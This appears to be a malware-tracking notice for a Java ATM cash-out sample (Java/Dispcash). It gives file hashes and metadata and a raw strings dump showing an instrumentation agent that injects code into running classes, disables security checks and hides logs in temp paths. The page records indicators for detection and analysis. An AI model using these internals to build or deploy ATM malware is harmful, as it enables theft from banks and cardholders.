.- - -----÷M÷E÷N÷U÷------------------------------------------------------------- --- ----  -------------.
!  WALL ! STATS ! GOODIES ! YARA ! FAQ ! RSS ! EMV                                                      !
`--------------  - ---  ---------- -------- -------- -------- -------- ----------------- -  ---- ---- --'

                                           ATM MALWARE NOTICE 
                    0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027
 
Date...........: 2019-03-04
Family.........: Java/Dispcash
File name......: INJX_PURE.jar
File size......: 254.99 KB
Type file......: JAR/Java
Virscan........: VT - HA
Documentation..: https://securelist.com/criminals-atms-and-a-cup-of-coffee/91406/
Additional note: Dropped by ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa

Entropy:


Binary Histogram:



=== Strings === 
File pos Mem pos ID Text ======== ======= == ==== 00000000001E 00000000001E 0 META-INF/UT 000000000031 000000000031 0 %z\ux 000000000061 000000000061 0 META-INF/MANIFEST.MFManifest-Version: 1.0 00000000008C 00000000008C 0 Ant-Version: Apache Ant 1.9.7 0000000000AB 0000000000AB 0 Created-By: 1.8.0_144-b01 (Oracle Corporation) 0000000000DB 0000000000DB 0 Class-Path: lib/tools.jar lib/lib/ 0000000000FF 0000000000FF 0 X-COMMENT: Main-Class will be added automatically by build 00000000013B 00000000013B 0 Main-Class: injx2.INJX 000000000153 000000000153 0 Agent-Class: injx2.Agent 00000000016D 00000000016D 0 Can-Retransform-Classes: true 00000000018C 00000000018C 0 Can-Redefine-Classes: true 0000000001C8 0000000001C8 0 conf/PK 0000000001EB 0000000001EB 0 dynamic/PK 000000000211 000000000211 0 injx2/UT 000000000221 000000000221 0 #z\ux 000000000251 000000000251 0 injx2/Agent$KRunnable.class 0000000003A7 0000000003A7 0 <init> 0000000003BD 0000000003BD 0 LineNumberTable 0000000003CF 0000000003CF 0 LocalVariableTable 0000000003EA 0000000003EA 0 KRunnable 0000000003F7 0000000003F7 0 InnerClasses 000000000406 000000000406 0 Linjx2/Agent$KRunnable; 00000000042B 00000000042B 0 Ljava/lang/Exception; 000000000443 000000000443 0 input 00000000044B 00000000044B 0 Ljava/io/FileInputStream; 000000000466 000000000466 0 origbytes 000000000478 000000000478 0 definition 000000000484 000000000484 0 &Ljava/lang/instrument/ClassDefinition; 0000000004B4 0000000004B4 0 targetClassInternalForm 0000000004CE 0000000004CE 0 Ljava/lang/String; 0000000004EC 0000000004EC 0 inscount 0000000004F7 0000000004F7 0 action 000000000508 000000000508 0 Ljava/io/File; 00000000051E 00000000051E 0 spaths 000000000527 000000000527 0 [Ljava/lang/String; 00000000053D 00000000053D 0 StackMapTable 00000000055F 00000000055F 0 SourceFile 00000000056C 00000000056C 0 Agent.java 000000000586 000000000586 0 java/lang/Exception 00000000059C 00000000059C 0 java/lang/String 0000000005AF 0000000005AF 0 /dev/shm/.AgentCli 0000000005C4 0000000005C4 0 /tmp/.AgentCli 0000000005D5 0000000005D5 0 c:\windows\temp\.AgentCli 0000000005F1 0000000005F1 0 c:\temp\.AgentCli 000000000605 000000000605 0 java/lang/StringBuilder 00000000061F 00000000061F 0 APPDATA 000000000636 000000000636 0 \.AgentCli 000000000648 000000000648 0 java/io/File 000000000666 000000000666 0 java/io/FileInputStream 000000000697 000000000697 0 Restoring: 0000000006E9 0000000006E9 0 $java/lang/instrument/ClassDefinition 00000000072D 00000000072D 0 java/io/PrintWriter 0000000007AA 0000000007AA 0 injx2/Agent$KRunnable 0000000007C2 0000000007C2 0 java/lang/Object 0000000007D5 0000000007D5 0 java/lang/Runnable 0000000007EA 0000000007EA 0 java/lang/Thread 0000000007FD 0000000007FD 0 sleep 00000000080C 00000000080C 0 java/lang/System 00000000081F 00000000081F 0 getenv 000000000827 000000000827 0 &(Ljava/lang/String;)Ljava/lang/String; File pos Mem pos ID Text ======== ======= == ==== 000000000851 000000000851 0 append 000000000859 000000000859 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 00000000088A 00000000088A 0 toString 000000000895 000000000895 0 ()Ljava/lang/String; 0000000008AC 0000000008AC 0 (Ljava/lang/String;)V 0000000008C4 0000000008C4 0 exists 0000000008D3 0000000008D3 0 isDirectory 0000000008E1 0000000008E1 0 (Ljava/io/File;)V 000000000902 000000000902 0 delete 00000000090B 00000000090B 0 injx2/Global 000000000921 000000000921 0 Ljava/io/BufferedWriter; 00000000093C 00000000093C 0 java/io/BufferedWriter 000000000955 000000000955 0 write 00000000095D 00000000095D 0 flush 000000000965 000000000965 0 injx2/Agent 000000000973 000000000973 0 instrumentedClassName 00000000098B 00000000098B 0 toeditcount 000000000999 000000000999 0 toedit 0000000009A2 0000000009A2 0 [Ljava/lang/Class; 0000000009B7 0000000009B7 0 java/lang/Class 0000000009C9 0000000009C9 0 getName 0000000009D3 0000000009D3 0 equals 0000000009DC 0000000009DC 0 (Ljava/lang/Object;)Z 0000000009F4 0000000009F4 0 Ljava/util/Hashtable; 000000000A0C 000000000A0C 0 java/util/Hashtable 000000000A27 000000000A27 0 &(Ljava/lang/Object;)Ljava/lang/Object; 000000000A51 000000000A51 0 clone 000000000A59 000000000A59 0 ()Ljava/lang/Object; 000000000A70 000000000A70 0 (Ljava/lang/Class;[B)V 000000000A89 000000000A89 0 access$000 000000000A95 000000000A95 0 (()Ljava/lang/instrument/Instrumentation; 000000000AC0 000000000AC0 0 $java/lang/instrument/Instrumentation 000000000AE8 000000000AE8 0 redefineClasses 000000000AF9 000000000AF9 0 *([Ljava/lang/instrument/ClassDefinition;)V 000000000B27 000000000B27 0 getMessage 000000000B34 000000000B34 0 (Ljava/io/Writer;)V 000000000B4A 000000000B4A 0 printStackTrace 000000000B5C 000000000B5C 0 (Ljava/io/PrintWriter;)V 000000000B77 000000000B77 0 chashes 000000000B81 000000000B81 0 hashes2 000000000B8B 000000000B8B 0 chashes2 000000000B96 000000000B96 0 instrumentedMethodName 000000000BAF 000000000BAF 0 instrumentedConstructorName 000000000BCD 000000000BCD 0 instrumentedArgsMap 000000000BE3 000000000BE3 0 acodeinsert 000000000BF1 000000000BF1 0 bcodeinsert 000000000BFF 000000000BFF 0 close 000000000C07 000000000C07 0 verpatch 000000000C12 000000000C12 0 scandyna 000000000C1D 000000000C1D 0 access$100 000000000C2A 000000000C2A 0 access$200 000000000C36 000000000C36 0 haverunya 000000000C43 000000000C43 0 runya 000000000C4B 000000000C4B 0 hashes3 000000000C55 000000000C55 0 chashes3 00000000118F 00000000118F 0 injx2/Agent.class 0000000015E0 0000000015E0 0 KRunnable 0000000015ED 0000000015ED 0 InnerClasses 000000001603 000000001603 0 Ljava/util/Properties; 00000000161C 00000000161C 0 instrumentedClassName File pos Mem pos ID Text ======== ======= == ==== 000000001634 000000001634 0 [Ljava/lang/String; 00000000164A 00000000164A 0 instrumentedMethodName 000000001663 000000001663 0 instrumentedConstructorName 000000001681 000000001681 0 instrumentedArgsMap 000000001697 000000001697 0 acodeinsert 0000000016A5 0000000016A5 0 bcodeinsert 0000000016B3 0000000016B3 0 instrumentit 0000000016C2 0000000016C2 0 toedit 0000000016CB 0000000016CB 0 [Ljava/lang/Class; 0000000016E0 0000000016E0 0 toeditcount 0000000016F2 0000000016F2 0 allLoadedClasses 000000001705 000000001705 0 cPool 00000000170D 00000000170D 0 Linjx2/javassist/ClassPool; 00000000172B 00000000172B 0 conffile 000000001736 000000001736 0 Ljava/lang/String; 00000000174B 00000000174B 0 global 000000001754 000000001754 0 hashes 00000000175D 00000000175D 0 chashes 000000001767 000000001767 0 hashes2 000000001771 000000001771 0 chashes2 00000000177C 00000000177C 0 hashes3 000000001786 000000001786 0 chashes3 000000001791 000000001791 0 disablesec 00000000179E 00000000179E 0 verpatch 0000000017A9 0000000017A9 0 detach 0000000017B1 0000000017B1 0 haverunya 0000000017BE 0000000017BE 0 otroval 0000000017C8 0000000017C8 0 instrumentation 0000000017D9 0000000017D9 0 &Ljava/lang/instrument/Instrumentation; 000000001803 000000001803 0 paths 00000000180B 00000000180B 0 cpaths 000000001814 000000001814 0 <init> 00000000182A 00000000182A 0 LineNumberTable 00000000183C 00000000183C 0 LocalVariableTable 000000001858 000000001858 0 Linjx2/Agent; 000000001868 000000001868 0 runya 000000001870 000000001870 0 concatenate 00000000187D 00000000187D 0 ;([Ljava/lang/Object;[Ljava/lang/Object;)[Ljava/lang/Object; 0000000018C0 0000000018C0 0 [Ljava/lang/Object; 0000000018EC 0000000018EC 0 LocalVariableTypeTable 000000001905 000000001905 0 [TClass; 00000000190F 00000000190F 0 Signature 00000000191B 00000000191B 0 4<Class:Ljava/lang/Object;>([TClass;[TClass;)[TClass; 000000001953 000000001953 0 allclass 00000000196A 00000000196A 0 Ljava/lang/Exception; 000000001987 000000001987 0 StackMapTable 00000000199A 00000000199A 0 checkinstance 0000000019A9 0000000019A9 0 ,(Ljava/lang/ClassLoader;Ljava/lang/String;)V 0000000019D9 0000000019D9 0 VALUES3 0000000019E3 0000000019E3 0 Ljava/util/Set; 0000000019F5 0000000019F5 0 cloader 0000000019FF 0000000019FF 0 Ljava/lang/ClassLoader; 000000001A19 000000001A19 0 lookfor 000000001A23 000000001A23 0 insta 000000001A2A 000000001A2A 0 #Ljava/util/Set<Ljava/lang/String;>; 000000001A51 000000001A51 0 patchall 000000001A5C 000000001A5C 0 loaded 000000001A65 000000001A65 0 inscount 000000001A6F 000000001A6F 0 container 000000001A7C 000000001A7C 0 mclassloader File pos Mem pos ID Text ======== ======= == ==== 000000001A96 000000001A96 0 Ljava/io/IOException; 000000001AAE 000000001AAE 0 argsplit 000000001AC5 000000001AC5 0 [Linjx2/javassist/CtClass; 000000001AE1 000000001AE1 0 signature 000000001B03 000000001B03 0 definition 000000001B0F 000000001B0F 0 &Ljava/lang/instrument/ClassDefinition; 000000001B39 000000001B39 0 ctClass 000000001B43 000000001B43 0 Linjx2/javassist/CtClass; 000000001B66 000000001B66 0 [Linjx2/javassist/CtMethod; 000000001B84 000000001B84 0 ctClassMethod 000000001B94 000000001B94 0 Linjx2/javassist/CtMethod; 000000001BB1 000000001BB1 0 ctConstructors 000000001BC1 000000001BC1 0 [Linjx2/javassist/CtConstructor; 000000001BF0 000000001BF0 0 someinject 000000001C1B 000000001C1B 0 loadconf 000000001C2B 000000001C2B 0 input 000000001C33 000000001C33 0 Ljava/io/FileInputStream; 000000001C4F 000000001C4F 0 porthttp 000000001C5A 000000001C5A 0 counter 000000001C67 000000001C67 0 setStaticValue 000000001C77 000000001C77 0 9(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Object;)V 000000001CB3 000000001CB3 0 className 000000001CBF 000000001CBF 0 fieldName 000000001CCC 000000001CCC 0 newValue 000000001CD7 000000001CD7 0 Ljava/lang/Object; 000000001CEC 000000001CEC 0 field 000000001CF4 000000001CF4 0 Ljava/lang/reflect/Field; 000000001D10 000000001D10 0 oldValue 000000001D1B 000000001D1B 0 Exceptions 000000001D37 000000001D37 0 appendalldir 000000001D45 000000001D45 0 ,(Ljava/io/File;Linjx2/javassist/ClassPool;)V 000000001D74 000000001D74 0 fileEntry 000000001D81 000000001D81 0 Ljava/io/File; 000000001D99 000000001D99 0 [Ljava/io/File; 000000001DB7 000000001DB7 0 folder 000000001DC9 000000001DC9 0 getClassResource 000000001DDB 000000001DDB 0 %(Ljava/lang/Class;)Ljava/lang/String; 000000001E04 000000001E04 0 klass 000000001E0C 000000001E0C 0 Ljava/lang/Class; 000000001E20 000000001E20 0 Ljava/lang/Class<*>; 000000001E39 000000001E39 0 ((Ljava/lang/Class<*>;)Ljava/lang/String; 000000001E65 000000001E65 0 IgetClassResource 000000001E78 000000001E78 0 =(Ljava/lang/ClassLoader;Ljava/lang/String;)Ljava/lang/String; 000000001EBF 000000001EBF 0 Ljava/net/URL; 000000001ED7 000000001ED7 0 VALUES 000000001EE6 000000001EE6 0 insertpaths 000000001EF3 000000001EF3 0 0(Ljava/lang/String;Linjx2/javassist/ClassPool;)V 000000001F27 000000001F27 0 pfolder 000000001F31 000000001F31 0 startagent 000000001F3D 000000001F3D 0 ;(Ljava/lang/String;Ljava/lang/instrument/Instrumentation;)V 000000001F7B 000000001F7B 0 agentArgs 000000001F8F 000000001F8F 0 errwrite 000000001F9A 000000001F9A 0 Ljava/io/PrintStream; 000000001FB1 000000001FB1 0 agentmain 000000001FBE 000000001FBE 0 bootstrapLoader 000000001FD0 000000001FD0 0 Ljava/net/URISyntaxException; 000000001FF0 000000001FF0 0 agentclasses 000000001FFF 000000001FFF 0 Ljava/util/jar/JarFile; 000000002022 000000002022 0 access$000 00000000202E 00000000202E 0 (()Ljava/lang/instrument/Instrumentation; File pos Mem pos ID Text ======== ======= == ==== 00000000205A 00000000205A 0 access$100 000000002067 000000002067 0 access$200 000000002074 000000002074 0 <clinit> 00000000207F 00000000207F 0 SourceFile 00000000208C 00000000208C 0 Agent.java 000000002114 000000002114 0 java/lang/Exception 00000000212A 00000000212A 0 java/util/HashSet 000000002195 000000002195 0 java/lang/StringBuilder 0000000021AF 0000000021AF 0 Class loaded: 0000000021D8 0000000021D8 0 injx2. 0000000021EB 0000000021EB 0 javassist. 0000000021FD 0000000021FD 0 .class 00000000221E 00000000221E 0 .jar! 00000000222D 00000000222D 0 .jar/ 00000000223C 00000000223C 0 file: 000000002255 000000002255 0 (unknown) 000000002263 000000002263 0 ERRORCR: 00000000227F 00000000227F 0 INJ: 00000000228E 00000000228E 0 java/io/IOException 0000000022A4 0000000022A4 0 injx2/Agent 0000000022CC 0000000022CC 0 java/util/Hashtable 0000000022FE 0000000022FE 0 java/io/ByteArrayInputStream 00000000234B 00000000234B 0 UNDECLARED 00000000236F 00000000236F 0 Method: 00000000238D 00000000238D 0 Argument: 0000000023A4 0000000023A4 0 Signature: 0000000023BF 0000000023BF 0 Match! 0000000023F8 0000000023F8 0 $java/lang/instrument/ClassDefinition 00000000242D 00000000242D 0 Injected: 00000000243A 00000000243A 0 No code to inject! 00000000244F 00000000244F 0 "Error: Native or Abstract method! 000000002475 000000002475 0 Error: 00000000247F 00000000247F 0 java/io/PrintWriter 00000000249F 00000000249F 0 java/lang/Class 0000000024B1 0000000024B1 0 java/lang/String 0000000024C4 0000000024C4 0 java/io/FileInputStream 0000000024F9 0000000024F9 0 65413 000000002512 000000002512 0 runonload 000000002524 000000002524 0 disablesecurity 000000002544 000000002544 0 verbose 000000002551 000000002551 0 logoutput 000000002563 000000002563 0 stdout 00000000256C 00000000256C 0 java/io/BufferedWriter 000000002585 000000002585 0 java/io/OutputStreamWriter 0000000025AC 0000000025AC 0 java/io/FileWriter 0000000025C6 0000000025C6 0 Started... 0000000025D4 0000000025D4 0 class 0000000025DC 0000000025DC 0 method 0000000025EA 0000000025EA 0 constructor 0000000025F8 0000000025F8 0 instrument 000000002605 000000002605 0 endcode 00000000260E 00000000260E 0 startcode 00000000261B 00000000261B 0 Class: 000000002624 000000002624 0 Method: 000000002631 000000002631 0 injx2.Agent 000000002665 000000002665 0 Append classpath: 000000002695 000000002695 0 Location: 0000000026A7 0000000026A7 0 java/io/File 0000000026CA 0000000026CA 0 java/io/PrintStream 0000000026E0 0000000026E0 0 java/io/FileOutputStream File pos Mem pos ID Text ======== ======= == ==== 0000000026FB 0000000026FB 0 C:\windows\temp\logerrdet2.txt 000000002726 000000002726 0 java.lang.System 000000002739 000000002739 0 security 000000002749 000000002749 0 X_X... 000000002753 000000002753 0 java/lang/Thread 000000002766 000000002766 0 injx2/Agent$KRunnable 000000002797 000000002797 0 java/util/jar/JarFile 0000000027E4 0000000027E4 0 $java/lang/instrument/Instrumentation 000000002811 000000002811 0 java/lang/Object 00000000282C 00000000282C 0 java/net/URISyntaxException 00000000284A 00000000284A 0 java/util/Properties 00000000287A 00000000287A 0 java/lang/ClassLoader 000000002892 000000002892 0 injx2/javassist/CtClass 0000000028AC 0000000028AC 0 injx2/javassist/CtMethod 0000000028C7 0000000028C7 0 java/lang/SecurityException 0000000028E5 0000000028E5 0 java/lang/NoSuchFieldException 000000002905 000000002905 0 java/lang/ClassNotFoundException 000000002928 000000002928 0 "java/lang/IllegalArgumentException 00000000294D 00000000294D 0 java/lang/IllegalAccessException 000000002971 000000002971 0 injx2/javassist/ClassPool 00000000298D 00000000298D 0 java/util/Set 00000000299D 00000000299D 0 java/net/URL 0000000029AC 0000000029AC 0 getClass 0000000029B7 0000000029B7 0 ()Ljava/lang/Class; 0000000029CD 0000000029CD 0 getComponentType 0000000029E0 0000000029E0 0 java/lang/reflect/Array 0000000029FA 0000000029FA 0 newInstance 000000002A07 000000002A07 0 &(Ljava/lang/Class;I)Ljava/lang/Object; 000000002A31 000000002A31 0 java/lang/System 000000002A43 000000002A43 0 arraycopy 000000002A4F 000000002A4F 0 *(Ljava/lang/Object;ILjava/lang/Object;II)V 000000002A7D 000000002A7D 0 getAllLoadedClasses 000000002A93 000000002A93 0 ()[Ljava/lang/Class; 000000002AAA 000000002AAA 0 getSystemClassLoader 000000002AC1 000000002AC1 0 ()Ljava/lang/ClassLoader; 000000002ADD 000000002ADD 0 getInitiatedClasses 000000002AF2 000000002AF2 0 +(Ljava/lang/ClassLoader;)[Ljava/lang/Class; 000000002B20 000000002B20 0 getParent 000000002B2D 000000002B2D 0 injx2/Global 000000002B3C 000000002B3C 0 runningclass 000000002B4B 000000002B4B 0 Ljava/util/Map; 000000002B5D 000000002B5D 0 getName 000000002B67 000000002B67 0 ()Ljava/lang/String; 000000002B7E 000000002B7E 0 java/util/Map 000000002B93 000000002B93 0 8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; 000000002BCF 000000002BCF 0 equals 000000002BD8 000000002BD8 0 (Ljava/lang/Object;)Z 000000002BF0 000000002BF0 0 java/util/Arrays 000000002C03 000000002C03 0 asList 000000002C0B 000000002C0B 0 %([Ljava/lang/Object;)Ljava/util/List; 000000002C34 000000002C34 0 (Ljava/util/Collection;)V 000000002C50 000000002C50 0 hashCode 000000002C61 000000002C61 0 java/lang/Integer 000000002C75 000000002C75 0 toString 000000002C80 000000002C80 0 (I)Ljava/lang/String; 000000002C98 000000002C98 0 contains 000000002CA3 000000002CA3 0 checklog 000000002CAE 000000002CAE 0 getDefault 000000002CBB 000000002CBB 0 ()Linjx2/javassist/ClassPool; 000000002CE2 000000002CE2 0 Ljava/io/BufferedWriter; File pos Mem pos ID Text ======== ======= == ==== 000000002CFD 000000002CFD 0 append 000000002D05 000000002D05 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 000000002D36 000000002D36 0 write 000000002D3E 000000002D3E 0 (Ljava/lang/String;)V 000000002D56 000000002D56 0 flush 000000002D5E 000000002D5E 0 startsWith 000000002D6B 000000002D6B 0 (Ljava/lang/String;)Z 000000002D83 000000002D83 0 getClassLoader 000000002D94 000000002D94 0 replace 000000002D9E 000000002D9E 0 (CC)Ljava/lang/String; 000000002DB7 000000002DB7 0 getResource 000000002DC4 000000002DC4 0 "(Ljava/lang/String;)Ljava/net/URL; 000000002DE9 000000002DE9 0 D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String; 000000002E31 000000002E31 0 printStackTrace 000000002E43 000000002E43 0 getLocalizedMessage 000000002E59 000000002E59 0 getMessage 000000002E66 000000002E66 0 java/util/logging/Logger 000000002E80 000000002E80 0 getLogger 000000002E8C 000000002E8C 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; 000000002EBE 000000002EBE 0 java/util/logging/Level 000000002ED8 000000002ED8 0 SEVERE 000000002EE1 000000002EE1 0 Ljava/util/logging/Level; 000000002F02 000000002F02 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 000000002F48 000000002F48 0 origbytes 000000002F55 000000002F55 0 Ljava/util/Hashtable; 000000002F72 000000002F72 0 &(Ljava/lang/Object;)Ljava/lang/Object; 000000002F9B 000000002F9B 0 -(Ljava/lang/String;)Linjx2/javassist/CtClass; 000000002FCC 000000002FCC 0 stopPruning 000000002FE1 000000002FE1 0 isFrozen 000000002FF2 000000002FF2 0 defrost 000000002FFC 000000002FFC 0 clone 000000003004 000000003004 0 ()Ljava/lang/Object; 00000000301B 00000000301B 0 ([B)V 000000003022 000000003022 0 makeClass 00000000302E 00000000302E 0 0(Ljava/io/InputStream;)Linjx2/javassist/CtClass; 000000003062 000000003062 0 rebuildClassFile 000000003075 000000003075 0 toBytecode 000000003089 000000003089 0 getDeclaredMethods 00000000309E 00000000309E 0 ()[Linjx2/javassist/CtMethod; 0000000030BE 0000000030BE 0 getDeclaredConstructors 0000000030D7 0000000030D7 0 "()[Linjx2/javassist/CtConstructor; 0000000030FD 0000000030FD 0 getDeclaredMethod 000000003110 000000003110 0 .(Ljava/lang/String;)Linjx2/javassist/CtMethod; 000000003142 000000003142 0 getParameterTypes 000000003156 000000003156 0 ()[Linjx2/javassist/CtClass; 000000003175 000000003175 0 split 00000000317C 00000000317C 0 '(Ljava/lang/String;)[Ljava/lang/String; 0000000031A7 0000000031A7 0 replaceAll 0000000031B3 0000000031B3 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 0000000031EF 0000000031EF 0 toUpperCase 0000000031FD 0000000031FD 0 getModifiers 00000000320C 00000000320C 0 injx2/javassist/Modifier 000000003227 000000003227 0 isNative 000000003239 000000003239 0 isAbstract 000000003246 000000003246 0 insertBefore 000000003255 000000003255 0 insertAfter 000000003263 000000003263 0 (Ljava/lang/Class;[B)V 00000000327C 00000000327C 0 redefineClasses 00000000328D 00000000328D 0 *([Ljava/lang/instrument/ClassDefinition;)V 0000000032BB 0000000032BB 0 (Ljava/io/Writer;)V File pos Mem pos ID Text ======== ======= == ==== 0000000032D1 0000000032D1 0 (Ljava/io/PrintWriter;)V 0000000032F3 0000000032F3 0 (Ljava/io/InputStream;)V 00000000330E 00000000330E 0 getProperty 00000000331C 00000000331C 0 parseInt 000000003327 000000003327 0 (Ljava/lang/String;)I 00000000333F 00000000333F 0 injx2/HTTPServ 00000000335B 00000000335B 0 &(Ljava/lang/String;)Ljava/lang/String; 00000000338B 00000000338B 0 (Ljava/io/OutputStream;)V 0000000033A7 0000000033A7 0 close 0000000033AF 0000000033AF 0 forName 0000000033B8 0000000033B8 0 %(Ljava/lang/String;)Ljava/lang/Class; 0000000033E1 0000000033E1 0 getDeclaredField 0000000033F3 0000000033F3 0 -(Ljava/lang/String;)Ljava/lang/reflect/Field; 000000003424 000000003424 0 java/lang/reflect/Field 00000000343E 00000000343E 0 setAccessible 00000000345A 00000000345A 0 '(Ljava/lang/Object;Ljava/lang/Object;)V 000000003485 000000003485 0 isDirectory 000000003492 000000003492 0 listFiles 00000000349F 00000000349F 0 ()[Ljava/io/File; 0000000034B3 0000000034B3 0 getCanonicalPath 0000000034C6 0000000034C6 0 appendClassPath 0000000034D7 0000000034D7 0 /(Ljava/lang/String;)Linjx2/javassist/ClassPath; 00000000350A 00000000350A 0 getParentFile 00000000351A 00000000351A 0 ()Ljava/io/File; 00000000352D 00000000352D 0 getAbsolutePath 00000000353F 00000000353F 0 (Ljava/lang/String;Z)V 000000003558 000000003558 0 setErr 000000003561 000000003561 0 (Ljava/io/PrintStream;)V 00000000357C 00000000357C 0 (Ljava/lang/Runnable;)V 000000003596 000000003596 0 start 00000000359E 00000000359E 0 sleep 0000000035AD 0000000035AD 0 getProtectionDomain 0000000035C2 0000000035C2 0 "()Ljava/security/ProtectionDomain; 0000000035E8 0000000035E8 0 java/security/ProtectionDomain 000000003609 000000003609 0 getCodeSource 000000003619 000000003619 0 ()Ljava/security/CodeSource; 000000003638 000000003638 0 java/security/CodeSource 000000003653 000000003653 0 getLocation 000000003661 000000003661 0 ()Ljava/net/URL; 000000003674 000000003674 0 toURI 00000000367C 00000000367C 0 ()Ljava/net/URI; 00000000368F 00000000368F 0 java/net/URI 00000000369E 00000000369E 0 getPath 0000000036A7 0000000036A7 0 "appendToBootstrapClassLoaderSearch 0000000036CD 0000000036CD 0 (Ljava/util/jar/JarFile;)V 0000000036EA 0000000036EA 0 currentThread 0000000036FA 0000000036FA 0 ()Ljava/lang/Thread; 000000003711 000000003711 0 setContextClassLoader 000000003729 000000003729 0 (Ljava/lang/ClassLoader;)V 000000003745 000000003745 0 loadClass 000000003751 000000003751 0 @(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method; 000000003795 000000003795 0 java/lang/reflect/Method 0000000037B0 0000000037B0 0 invoke 0000000037B8 0000000037B8 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 000000005988 000000005988 0 injx2/Global.class 000000005AFD 000000005AFD 0 Ljava/io/BufferedWriter; 000000005B18 000000005B18 0 verbose 000000005B25 000000005B25 0 logoutput 000000005B32 000000005B32 0 Ljava/lang/String; 000000005B47 000000005B47 0 instrument File pos Mem pos ID Text ======== ======= == ==== 000000005B53 000000005B53 0 &Ljava/lang/instrument/Instrumentation; 000000005B7C 000000005B7C 0 origbytes 000000005B89 000000005B89 0 Ljava/util/Hashtable; 000000005BA0 000000005BA0 0 Signature 000000005BAC 000000005BAC 0 +Ljava/util/Hashtable<Ljava/lang/String;[B>; 000000005BDB 000000005BDB 0 alreadyinjected 000000005BEC 000000005BEC 0 ;Ljava/util/Hashtable<Ljava/lang/String;Ljava/lang/String;>; 000000005C31 000000005C31 0 Ljava/util/Map; 000000005C42 000000005C42 0 5Ljava/util/Map<Ljava/lang/Object;Ljava/lang/Object;>; 000000005C7B 000000005C7B 0 stack 000000005C83 000000005C83 0 classmap 000000005C8E 000000005C8E 0 runningclass 000000005C9D 000000005C9D 0 <init> 000000005CB3 000000005CB3 0 LineNumberTable 000000005CC5 000000005CC5 0 LocalVariableTable 000000005CE1 000000005CE1 0 Linjx2/Global; 000000005CF2 000000005CF2 0 scandyna 000000005D07 000000005D07 0 tsize 000000005D19 000000005D19 0 Ljava/util/zip/ZipEntry; 000000005D41 000000005D41 0 Ljava/net/URL; 000000005D57 000000005D57 0 Ljava/io/IOException; 000000005D75 000000005D75 0 Ljava/util/zip/ZipInputStream; 000000005D9C 000000005D9C 0 Ljava/security/CodeSource; 000000005DB9 000000005DB9 0 StackMapTable 000000005DDE 000000005DDE 0 callback 000000005DE8 000000005DE8 0 K(Ljava/lang/String;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object; 000000005E37 000000005E37 0 ptype 000000005E3F 000000005E3F 0 [Ljava/lang/Class; 000000005E54 000000005E54 0 mname 000000005E65 000000005E65 0 Ljava/lang/Class; 000000005E7D 000000005E7D 0 Ljava/lang/Object; 000000005E99 000000005E99 0 [Ljava/lang/reflect/Method; 000000005EB7 000000005EB7 0 Ljava/lang/Exception; 000000005ECF 000000005ECF 0 classs 000000005ED8 000000005ED8 0 method 000000005EE8 000000005EE8 0 [Ljava/lang/Object; 000000005F03 000000005F03 0 Linjx2/ViewClassLoader; 000000005F1D 000000005F1D 0 LocalVariableTypeTable 000000005F36 000000005F36 0 [Ljava/lang/Class<*>; 000000005F62 000000005F62 0 insertjar 000000005F6F 000000005F6F 0 ([B)V 000000005F77 000000005F77 0 cname 000000005F7F 000000005F7F 0 stream 000000005F88 000000005F88 0 entry 000000005F90 000000005F90 0 jfile 000000005F98 000000005F98 0 checklog 000000005FAF 000000005FAF 0 Ljava/io/File; 000000005FC3 000000005FC3 0 <clinit> 000000005FCE 000000005FCE 0 SourceFile 000000005FDB 000000005FDB 0 Global.java 000000005FEE 000000005FEE 0 injx2/Global 000000006015 000000006015 0 java/util/zip/ZipInputStream 00000000604E 00000000604E 0 dynamic/ 000000006089 000000006089 0 java/io/IOException 0000000060B4 0000000060B4 0 injx2/ViewClassLoader 0000000060E8 0000000060E8 0 java/lang/Object 000000006100 000000006100 0 java/lang/Exception 000000006116 000000006116 0 java/io/ByteArrayInputStream 00000000613A 00000000613A 0 .class 000000006169 000000006169 0 java/io/File File pos Mem pos ID Text ======== ======= == ==== 000000006178 000000006178 0 /dev/shm 00000000618D 00000000618D 0 java/lang/StringBuilder 0000000061AC 0000000061AC 0 /.loginside 0000000061BF 0000000061BF 0 os.name 0000000061DE 0000000061DE 0 APPDATA 0000000061ED 0000000061ED 0 \logft.log 0000000061FA 0000000061FA 0 stdout 000000006203 000000006203 0 java/io/BufferedWriter 00000000621C 00000000621C 0 java/io/OutputStreamWriter 000000006248 000000006248 0 java/io/FileWriter 000000006262 000000006262 0 java/util/HashMap 00000000628D 00000000628D 0 java/security/CodeSource 0000000062A8 0000000062A8 0 java/net/URL 0000000062B7 0000000062B7 0 java/util/zip/ZipEntry 0000000062D0 0000000062D0 0 java/lang/Throwable 0000000062E6 0000000062E6 0 java/lang/String 0000000062F9 0000000062F9 0 java/lang/Class 00000000630B 00000000630B 0 getProtectionDomain 000000006320 000000006320 0 "()Ljava/security/ProtectionDomain; 000000006346 000000006346 0 java/security/ProtectionDomain 000000006367 000000006367 0 getCodeSource 000000006377 000000006377 0 ()Ljava/security/CodeSource; 000000006396 000000006396 0 getLocation 0000000063A4 0000000063A4 0 ()Ljava/net/URL; 0000000063B7 0000000063B7 0 openStream 0000000063C4 0000000063C4 0 ()Ljava/io/InputStream; 0000000063DE 0000000063DE 0 (Ljava/io/InputStream;)V 0000000063F9 0000000063F9 0 getNextEntry 000000006408 000000006408 0 ()Ljava/util/zip/ZipEntry; 000000006425 000000006425 0 getName 00000000642F 00000000642F 0 ()Ljava/lang/String; 000000006446 000000006446 0 startsWith 000000006453 000000006453 0 (Ljava/lang/String;)Z 00000000646B 00000000646B 0 endsWith 000000006476 000000006476 0 getSize 00000000648D 00000000648D 0 ([B)I 000000006495 000000006495 0 java/lang/System 0000000064A7 0000000064A7 0 arraycopy 0000000064B3 0000000064B3 0 *(Ljava/lang/Object;ILjava/lang/Object;II)V 0000000064E1 0000000064E1 0 close 0000000064E9 0000000064E9 0 